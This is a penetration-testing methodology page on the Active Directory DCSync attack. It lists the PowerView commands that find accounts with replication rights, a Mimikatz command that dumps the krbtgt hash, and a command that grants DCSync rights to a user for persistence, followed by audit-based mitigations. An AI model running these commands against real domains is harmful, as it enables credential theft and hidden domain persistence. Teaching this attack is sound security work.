hacktricks/windows/active-directory-methodology/dcsync.md

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# DCSync
## DCSync
The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.
**Important Notes about DCSync:**
* The **DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information** using the Directory Replication Service Remote Protocol \(MS-DRSR\). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
* By default only **Domain Admins, Enterprise Admins, Administrators, and Domain Controllers** groups have the required privileges.
* If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text
### Enumeration
Check who has these permissions using `powerview`:
```bash
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
```
### Exploit
```bash
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```
### Persistence
If you are a domain admin, you can grant this permissions to any user with the help of `powerview`:
```bash
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
```
Then, you can **check if the user was correctly assigned** the 3 privileges looking for them in the output of \(you should be able to see the names of the privileges inside the "ObjectType" field\):
```bash
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
```
### Mitigation
* Security Event ID 4662 \(Audit Policy for object must be enabled\) An operation was performed on an object
* Security Event ID 5136 \(Audit Policy for object must be enabled\) A directory service object was modified
* Security Event ID 4670 \(Audit Policy for object must be enabled\) Permissions on an object were changed
* AD ACL Scanner - Create and compare create reports of ACLs. [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
\*\*\*\*[**More information about DCSync in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync)\*\*\*\*